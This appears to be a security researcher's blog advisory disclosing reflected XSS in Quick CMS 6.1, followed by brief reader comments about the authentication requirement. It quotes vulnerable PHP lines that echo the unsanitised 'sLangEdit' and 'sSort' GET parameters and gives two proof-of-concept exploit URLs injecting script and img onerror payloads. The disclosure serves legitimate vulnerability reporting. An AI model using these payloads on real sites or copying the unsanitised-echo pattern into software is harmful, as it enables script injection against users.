Quick CMS v 6.1 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick CMS
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.1
#Home page Link  : http://opensolution.org/home.html
#Website  : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date        : 19/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-

 “sLangEdit” and “sSort” parameters are not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

File Name: languages.php
Found at line:23

<h1><?php echo $lang[‘Languages’].( isset( $_GET[‘sLangEdit’] ) ? ‘ ‘.$_GET[‘sLangEdit’] : null ); ?></h1>

File Name: pages.php
Found at line:49

<form action=”?p=pages<?php if( isset( $_GET[‘sSort’] ) ) echo ‘&amp;sSort=’.$_GET[‘sSort’]; ?>” name=”form” method=”post” class=”main-form”>

—————————————-
Exploit:
—————————————-
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script >alert(“XSS”)</script ><h1>

localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort=”><img%20src=x%20onerror=confirm(1)><!–

—————————————-
POC:
—————————————-

Quick.Cms v6.1xsspoc

Quick.Cms v6.1xsspoc2

Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)

Public Disclosure: 19/1/2016

Advertisements

2 thoughts on “Quick CMS v 6.1 XSS Vulnerability

  1. Does the exploit also work outside of admin.php? If not, it would mean that you need to have admin rights in order to “break in” and plant your code … but since you have admin rights already, it’s useless to break it. Please correct me if I’m wrong.

    Like

    • Indeed, in this advisory, authentication is required, else it’s useless. This advisory is just to show the poor coding and unvalidated parameters. These vulnerable parameters might have been used at numerous places in code which won’t require authentication.

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s